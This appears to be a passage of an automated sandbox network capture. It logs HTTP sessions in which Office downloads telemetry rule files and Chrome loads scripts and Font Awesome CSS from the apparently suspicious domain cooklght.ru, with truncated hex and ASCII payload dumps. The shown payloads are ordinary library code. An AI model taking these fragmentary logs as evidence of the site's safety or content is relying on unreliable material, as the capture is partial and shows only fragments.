                                                                            2024-10-28 08:37:03 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:03 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:03 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 632
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                            ETag: "0x8DC582BB6E3779E"
                                                                            x-ms-request-id: 1f7bc680-101e-0065-6904-274088000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083703Z-16849878b78tg5n42kspfr0x4800000004rg00000000bhu3
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:03 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            44192.168.2.449800104.21.91.1454431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:03 UTC570OUTGET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1
                                                                            Host: cooklght.ru
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: script
                                                                            Referer: https://cooklght.ru//
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:37:03 UTC752INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:03 GMT
                                                                            Content-Type: application/javascript
                                                                            Content-Length: 1239
                                                                            Connection: close
                                                                            Last-Modified: Tue, 22 Oct 2024 20:47:58 GMT
                                                                            ETag: "67180f7e-4d7"
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okoJYu%2FbMZ4LbVthg6fGzLHIfTze75RFqJ3pzT8%2BH85tY%2BZoFrU5SrpCniVYUlt%2FFRUmDbpckcshRq2WJQiACBggEzB9z%2FNn8fn6t68RVJ6OpDTylXBNvxeHIdRm9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999a09d8ef6b2e-DFW
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            Expires: Wed, 30 Oct 2024 08:37:03 GMT
                                                                            Cache-Control: max-age=172800
                                                                            Cache-Control: public
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:03 UTC617INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 72 79 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 29 72 65 74 75 72 6e 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 61 20 68 72 65 66 3d 22 27 2b 65 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2b 27 22 3e 3c 2f 61 3e 27 2c 64 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66
                                                                            Data Ascii: !function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href
                                                                            2024-10-28 08:37:03 UTC622INData Raw: 66 2c 61 2b 6c 2e 6c 65 6e 67 74 68 29 29 7d 63 61 74 63 68 28 69 29 7b 65 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 63 3d 30 3b 63 3c 72 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 74 72 79 7b 76 61 72 20 6f 3d 72 5b 63 5d 2c 61 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 69 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 66 29 3b 69 66 28 69 29 7b 76 61 72 20 6c 3d 6e 28 69 2c 30 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6c 29 3b 61 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 64 2c 6f 29 7d 7d 63 61 74 63 68 28 68 29 7b 65 28 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e
                                                                            Data Ascii: f,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            45192.168.2.449807104.17.25.144431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:04 UTC573OUTGET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1
                                                                            Host: cdnjs.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: text/css,*/*;q=0.1
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: style
                                                                            Referer: https://cooklght.ru/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:37:04 UTC948INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:04 GMT
                                                                            Content-Type: text/css; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: public, max-age=30672000
                                                                            ETag: W/"656632a7-54f3"
                                                                            Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                            cf-cdnjs-via: cfworker/kv
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Timing-Allow-Origin: *
                                                                            X-Content-Type-Options: nosniff
                                                                            CF-Cache-Status: HIT
                                                                            Age: 392383
                                                                            Expires: Sat, 18 Oct 2025 08:37:04 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lisC06epmCOs0PB8XvtEktXkDBKQt8fRrs7XJXuzc43W%2F6eLSLeGMWagZg7Dm3x4oNAANj6o4xwoUbc5MXaptCd1SDzb8BaOeos9u7KsGaOQpzK3w9n%2FAGxm%2FK13B%2B%2FAKx32L5wh"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                            Strict-Transport-Security: max-age=15780000
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999a0dad524653-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:37:04 UTC421INData Raw: 33 39 38 37 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 35 2e 30 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 33 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                                            Data Ascii: 3987/*! * Font Awesome Free 6.5.0 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2023 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                                            2024-10-28 08:37:04 UTC1369INData Raw: 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 63 6c 61 73 73 69 63 2c 2e 66 61 2d 72 65 67 75 6c 61 72 2c 2e 66 61 2d 73 6f 6c 69 64 2c 2e 66 61 72 2c 2e 66 61 73 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 46 72 65 65 22 7d 2e 66 61 2d 62 72 61 6e 64 73 2c 2e 66 61 62 7b 66 6f 6e 74 2d 66 61 6d 69 6c
                                                                            Data Ascii: cale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-famil
                                                                            2024-10-28 08:37:04 UTC1369INData Raw: 70 75 6c 6c 2d 6c 65 66 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 70 75 6c 6c 2d 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65
                                                                            Data Ascii: pull-left{float:left;margin-right:var(--fa-pull-margin,.3em)}.fa-pull-right{float:right;margin-left:var(--fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0s);animation-de
                                                                            2024-10-28 08:37:04 UTC1369INData Raw: 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a
                                                                            Data Ascii: ation-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1));animation-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:
                                                                            2024-10-28 08:37:04 UTC1369INData Raw: 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74
                                                                            Data Ascii: fa-animation-delay,0s);animation-delay:var(--fa-animation-delay,0s);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animat
                                                                            2024-10-28 08:37:04 UTC1369INData Raw: 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69
                                                                            Data Ascii: n:var(--fa-animation-duration,2s);animation-duration:var(--fa-animation-duration,2s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-ti
                                                                            2024-10-28 08:37:04 UTC1369INData Raw: 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74
                                                                            Data Ascii: sition-duration:0s;transition-duration:0s}}@-webkit-keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit
                                                                            2024-10-28 08:37:04 UTC1369INData Raw: 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65
                                                                            Data Ascii: 0);transform:scale(1) translateY(0)}to{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}}@keyframes fa-bounce{0%{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce
                                                                            2024-10-28 08:37:04 UTC1369INData Raw: 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61
                                                                            Data Ascii: (--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opa
                                                                            2024-10-28 08:37:04 UTC1369INData Raw: 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 32 64 65 67 29 7d 33 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 7d 34 30 25 2c 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 68 61 6b 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67
                                                                            Data Ascii: orm:rotate(-12deg)}36%{-webkit-transform:rotate(12deg);transform:rotate(12deg)}40%,to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes fa-shake{0%{-webkit-transform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            46192.168.2.44981113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:04 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:04 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:04 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 407
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                            x-ms-request-id: 962f3e82-b01e-0070-52cb-261cc0000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083704Z-r197bdfb6b4wmcgqdschtyp7yg00000004kg0000000086xe
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:04 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            47192.168.2.44981213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:04 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:04 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:04 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 427
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                            ETag: "0x8DC582BA310DA18"
                                                                            x-ms-request-id: 6b0d144c-801e-007b-3a49-27e7ab000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083704Z-16849878b78wc6ln1zsrz6q9w800000004c000000000cwkx
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
